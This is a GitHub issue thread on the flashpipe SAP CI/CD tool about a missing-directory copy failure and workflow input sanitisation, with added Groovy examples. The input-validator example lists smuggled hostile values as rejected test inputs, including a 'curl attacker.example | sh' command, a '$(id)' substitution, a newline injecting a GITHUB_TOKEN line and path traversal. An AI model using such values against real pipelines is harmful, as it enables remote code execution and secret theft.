engswee / flashpipe

The CI/CD Companion for SAP Integration Suite
https://engswee.github.io/flashpipe/
Apache License 2.0

Problem with recursive directory creation #3

Closed ambravo closed 3 years ago

ambravo commented 3 years ago

Issue: When synchronising a package and the target directory does not exist in the repo, and the target includes multiple subdirectories, the process fails and the workflow is aborted.

Could the input be sanitised as well?

Example: (screenshot of the GitHub Actions run amba-cpiou-demo-fp, 2021-07-08 at 10:59:27 am)

Guilty? https://github.com/engswee/flashpipe/blob/88569403330099d55a3a648a26497dcb3ae10f18/src/main/groovy/io/github/engswee/flashpipe/cpi/exec/DownloadIntegrationPackageContent.groovy#L130

Possible solution? Use File.mkdirs()

                // (2) If IFlow does not exist in Git, then add it
                if (!new File(gitSrcDir).exists()) {
                    new File(gitSrcDir).mkdirs()   //<<<<<---- Here
                }

Stack trace

    2021-07-08T08:58:33.5782447Z Exception in thread "main" java.lang.reflect.UndeclaredThrowableException
    2021-07-08T08:58:33.5789056Z     at com.sun.proxy.$Proxy19.accept(Unknown Source)
    2021-07-08T08:58:33.5790146Z     at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:183)
    2021-07-08T08:58:33.5794206Z     at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)
    2021-07-08T08:58:33.5798588Z     at java.util.Iterator.forEachRemaining(Iterator.java:116)
    2021-07-08T08:58:33.5800275Z     at java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1801)
    2021-07-08T08:58:33.5806258Z     at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:482)
    2021-07-08T08:58:33.5807910Z     at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:472)
    2021-07-08T08:58:33.5814108Z     at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:150)
    2021-07-08T08:58:33.5815579Z     at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:173)
    2021-07-08T08:58:33.5831099Z     at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
    2021-07-08T08:58:33.5832588Z     at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:485)
    2021-07-08T08:58:33.5869496Z     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    2021-07-08T08:58:33.5871232Z     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    2021-07-08T08:58:33.5905415Z     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    2021-07-08T08:58:33.5907125Z     at java.lang.reflect.Method.invoke(Method.java:498)
    2021-07-08T08:58:33.5909197Z     at org.codehaus.groovy.runtime.callsite.PojoMetaMethodSite$PojoCachedMethodSiteNoUnwrap.invoke(PojoMetaMethodSite.java:213)
    2021-07-08T08:58:33.5912051Z     at org.codehaus.groovy.runtime.callsite.PojoMetaMethodSite.call(PojoMetaMethodSite.java:56)
    2021-07-08T08:58:33.5914335Z     at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47)
    2021-07-08T08:58:33.5916976Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116)
    2021-07-08T08:58:33.5919297Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:128)
    2021-07-08T08:58:33.5922735Z     at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.copyDirectory(DownloadIntegrationPackageContent.groovy:190)
    2021-07-08T08:58:33.5925484Z     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    2021-07-08T08:58:33.5927033Z     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    2021-07-08T08:58:33.5929082Z     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    2021-07-08T08:58:33.5930558Z     at java.lang.reflect.Method.invoke(Method.java:498)
    2021-07-08T08:58:33.5932579Z     at org.codehaus.groovy.runtime.callsite.PogoMetaMethodSite$PogoCachedMethodSiteNoUnwrap.invoke(PogoMetaMethodSite.java:190)
    2021-07-08T08:58:33.5935470Z     at org.codehaus.groovy.runtime.callsite.PogoMetaMethodSite.callCurrent(PogoMetaMethodSite.java:59)
    2021-07-08T08:58:33.5938333Z     at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCallCurrent(CallSiteArray.java:51)
    2021-07-08T08:58:33.5940858Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callCurrent(AbstractCallSite.java:157)
    2021-07-08T08:58:33.5943308Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callCurrent(AbstractCallSite.java:177)
    2021-07-08T08:58:33.5946752Z     at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.execute(DownloadIntegrationPackageContent.groovy:133)
    2021-07-08T08:58:33.5950635Z     at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent$execute.call(Unknown Source)
    2021-07-08T08:58:33.5953634Z     at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47)
    2021-07-08T08:58:33.5955788Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116)
    2021-07-08T08:58:33.5958064Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:120)
    2021-07-08T08:58:33.5961992Z     at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.main(DownloadIntegrationPackageContent.groovy:20)
    2021-07-08T08:58:33.5973066Z Caused by: java.nio.file.NoSuchFileException: /__w/xxxxxx-removed-xxxxxxxx
    2021-07-08T08:58:33.5975104Z     at sun.nio.fs.UnixException.translateToIOException(UnixException.java:86)
    2021-07-08T08:58:33.5977560Z     at sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:102)
    2021-07-08T08:58:33.5979753Z     at sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:107)
    2021-07-08T08:58:33.5981272Z     at sun.nio.fs.UnixCopyFile.copyDirectory(UnixCopyFile.java:136)
    2021-07-08T08:58:33.5982307Z     at sun.nio.fs.UnixCopyFile.copy(UnixCopyFile.java:572)
    2021-07-08T08:58:33.5983469Z     at sun.nio.fs.UnixFileSystemProvider.copy(UnixFileSystemProvider.java:253)
    2021-07-08T08:58:33.5984564Z     at java.nio.file.Files.copy(Files.java:1274)
    2021-07-08T08:58:33.5985597Z     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    2021-07-08T08:58:33.5987131Z     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    2021-07-08T08:58:33.5988976Z     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    2021-07-08T08:58:33.5990425Z     at java.lang.reflect.Method.invoke(Method.java:498)
    2021-07-08T08:58:33.5991718Z     at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:98)
    2021-07-08T08:58:33.5993130Z     at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:325)
    2021-07-08T08:58:33.5994984Z     at org.codehaus.groovy.runtime.callsite.StaticMetaMethodSite.invoke(StaticMetaMethodSite.java:46)
    2021-07-08T08:58:33.5997461Z     at org.codehaus.groovy.runtime.callsite.StaticMetaMethodSite.call(StaticMetaMethodSite.java:91)
    2021-07-08T08:58:33.6001282Z     at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47)
    2021-07-08T08:58:33.6004577Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116)
    2021-07-08T08:58:33.6006667Z     at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:144)
    2021-07-08T08:58:33.6009507Z     at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent$_copyDirectory_closure4.doCall(DownloadIntegrationPackageContent.groovy:192)
    2021-07-08T08:58:33.6011973Z     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    2021-07-08T08:58:33.6013689Z     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    2021-07-08T08:58:33.6016081Z     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    2021-07-08T08:58:33.6017841Z     at java.lang.reflect.Method.invoke(Method.java:498)
    2021-07-08T08:58:33.6019320Z     at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:98)
    2021-07-08T08:58:33.6021015Z     at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:325)
    2021-07-08T08:58:33.6023115Z     at org.codehaus.groovy.runtime.metaclass.ClosureMetaClass.invokeMethod(ClosureMetaClass.java:264)
    2021-07-08T08:58:33.6025042Z     at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1034)
    2021-07-08T08:58:33.6026166Z     at groovy.lang.Closure.call(Closure.java:420)
    2021-07-08T08:58:33.6027526Z     at org.codehaus.groovy.runtime.ConvertedClosure.invokeCustom(ConvertedClosure.java:54)
    2021-07-08T08:58:33.6029421Z     at org.codehaus.groovy.runtime.ConversionHandler.invoke(ConversionHandler.java:124)
    2021-07-08T08:58:33.6030470Z     ... 36 more
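To make the failure and the fix concrete, here is an added Groovy example (not flashpipe's own code) that builds a throwaway package directory, reproduces the NoSuchFileException with a plain Files.copy into a target whose parent directories are missing, and then copies the tree after creating the parent chain. The directory names and the .iflw file are constructed for the example, and copyTree is an illustrative helper, not the project's copyDirectory.

```groovy
import java.nio.file.Files
import java.nio.file.NoSuchFileException
import java.nio.file.Path
import java.nio.file.StandardCopyOption

// Added example, not flashpipe code: reproduce the NoSuchFileException from the
// stack trace above and show the mkdirs() / Files.createDirectories() fix.
// Files.copy(dir, target) creates only the last element of target; it throws
// NoSuchFileException as soon as any parent of target is missing.

// Copy a directory tree, recreating the parent chain of `to` first (the fix).
// Illustrative helper; the project's own method is copyDirectory.
void copyTree(Path from, Path to) {
    Files.createDirectories(to)   // like new File(to.toString()).mkdirs(), but throws on failure
    def stream = Files.walk(from)
    try {
        stream.forEach { Path p ->
            Path dest = to.resolve(from.relativize(p).toString())
            if (Files.isDirectory(p)) {
                Files.createDirectories(dest)
            } else {
                Files.copy(p, dest, StandardCopyOption.REPLACE_EXISTING)
            }
        }
    } finally {
        stream.close()
    }
}

// Constructed layout: a downloaded package on one side, an empty "repo" checkout on the other.
Path tmp = Files.createTempDirectory('flashpipe-issue3')
Path src = tmp.resolve('download/Flow1')
Files.createDirectories(src.resolve('src/main/resources'))
Files.write(src.resolve('src/main/resources/Flow1.iflw'), '<iflow/>'.bytes)

// Target three levels deep that does not exist yet in the checkout.
Path gitSrcDir = tmp.resolve('repo/integration/content/Flow1')

// Before the fix: copying into a missing parent chain fails exactly as in the trace.
try {
    Files.copy(src, gitSrcDir, StandardCopyOption.REPLACE_EXISTING)
} catch (NoSuchFileException e) {
    println "Without mkdirs(): NoSuchFileException: ${e.message}"
}

// After the fix: parents are created first, then the tree is copied.
copyTree(src, gitSrcDir)
assert Files.isRegularFile(gitSrcDir.resolve('src/main/resources/Flow1.iflw'))
println "With createDirectories(): ${gitSrcDir}"

tmp.toFile().deleteDir()
```

One caveat when applying the suggested one-liner: File.mkdirs() returns false rather than throwing when the chain cannot be created (permissions, a file already occupying a parent name), so an ignored return value means the later copy fails again with a less obvious error. Files.createDirectories throws an IOException at the point of failure, which is the friendlier behaviour in a CI step.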

engswee commented 3 years ago

Wow. Looks like you are really giving this a go 😉 Thanks!

Thanks for such a detailed description of the issue... and the possible solution as well. Indeed mkdirs() would fix this.

What are your thoughts on sanitising the input?

P.S.: In future, you are always welcome to submit a PR 😉

ambravo commented 3 years ago

I will consider the PR next time. I believe the hardest part of that is to recreate the scenario locally.

In regards to sanitising, I don't have anything in mind. However, using GStrings without sanitisation makes me uncomfortable. An image will speak louder. See the example below; I believe you will guess how it ended 😅.

(screenshot of the GitHub Actions run amba-cpiou-demo-fp, 2021-07-08 at 5:12:39 pm)

engswee commented 3 years ago

Nice catch! You really have a knack for finding security loopholes! 😂

The issue is actually not with GString interpolation. It happens way before it even reaches the Java/Groovy bit.

The value is resolved at the workflow level when setting the dynamic environment variable using echo. This is quite specific to GitHub Actions.


Nevertheless, validating the values of input still makes sense so I'm including that in the next release which will be out pretty soon.

Thanks again for the feedback!
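Since the thread does not show the payload from the screenshot, the following is an added Groovy example (not flashpipe's own code) of the kind of input validation the maintainer mentions: a directory value that arrives from a pipeline input, gets echoed into a workflow environment file and is later used as a filesystem path. SEGMENT, MAX_LEN, validateRelativeDir, resolveUnderRoot, checkAll and the workspace path /__w/repo are assumptions for the example, and the rejected inputs are constructed; validation in the Groovy program does not replace quoting and safe expansion at the workflow level, since the thread notes the expansion happens there first.

```groovy
import groovy.transform.Field
import java.nio.file.Path
import java.nio.file.Paths
import java.util.regex.Pattern

// Added example, not flashpipe code: validate a directory value that comes from a
// pipeline input before it is used to build a path or echoed into $GITHUB_ENV.
// $GITHUB_ENV is line-oriented ("NAME=value" per line) and a `run:` step expands
// `${{ inputs.x }}` as shell text, so the check rejects newlines and every character
// the shell treats specially, and never lets a segment climb out of the checkout.

// One path segment: letters, digits, '.', '_' and '-' only (assumed policy).
@Field final Pattern SEGMENT = ~/[A-Za-z0-9._-]+/
@Field final int MAX_LEN = 200

String validateRelativeDir(String raw) {
    if (raw == null || raw.trim().isEmpty()) {
        throw new IllegalArgumentException('directory must not be empty')
    }
    if (raw.length() > MAX_LEN) {
        throw new IllegalArgumentException("directory longer than ${MAX_LEN} characters")
    }
    // Control characters cover \n and \r (extra $GITHUB_ENV lines) as well as NUL
    if (raw =~ /\p{Cntrl}/) {
        throw new IllegalArgumentException('directory contains control characters')
    }
    if (raw.startsWith('/') || raw.contains('\\') || raw ==~ /^[A-Za-z]:.*/) {
        throw new IllegalArgumentException('directory must be relative and use "/" separators')
    }
    // limit -1 keeps empty segments, so "a//b", "a/" and "/a" all fail here
    for (String segment : raw.split('/', -1)) {
        if (segment.isEmpty() || segment == '.' || segment == '..' || !(segment ==~ SEGMENT)) {
            throw new IllegalArgumentException("invalid path segment '${segment}'")
        }
    }
    return raw
}

// Resolve the validated value under the workspace and confirm it still lies inside it
// (belt and braces: the segment rules above already exclude "..").
Path resolveUnderRoot(Path root, String validated) {
    Path base = root.toAbsolutePath().normalize()
    Path target = base.resolve(validated).normalize()
    if (!target.startsWith(base)) {
        throw new IllegalArgumentException("'${validated}' escapes ${base}")
    }
    return target
}

// Run every candidate through both checks and report the verdict per input.
Map<String, String> checkAll(Path root, List<String> candidates) {
    candidates.collectEntries { String c ->
        try {
            [(c): "ok -> ${resolveUnderRoot(root, validateRelativeDir(c))}".toString()]
        } catch (IllegalArgumentException e) {
            [(c): "rejected: ${e.message}".toString()]
        }
    }
}

// Constructed inputs: one legitimate value and several that a CI input must reject.
Path workspace = Paths.get('/__w/repo')   // hypothetical runner workspace
checkAll(workspace, [
    'integration/content/Flow1',
    '../../../etc/cron.d',
    'content; curl attacker.example | sh',
    'content$(id)',
    'content\nGITHUB_TOKEN=stolen',
    '/absolute/path',
]).each { input, verdict -> println "${input.inspect()}: ${verdict}" }
```

The allow-list approach is deliberate: rejecting a list of known-bad characters (`;`, `$`, backticks) misses the next one, whereas accepting only a small safe alphabet makes the value harmless both as a shell word and as a single line in the environment file. Only the first input above passes; the traversal, the command separators, the `$(...)` expansion, the embedded newline and the absolute path are all rejected before any path is built.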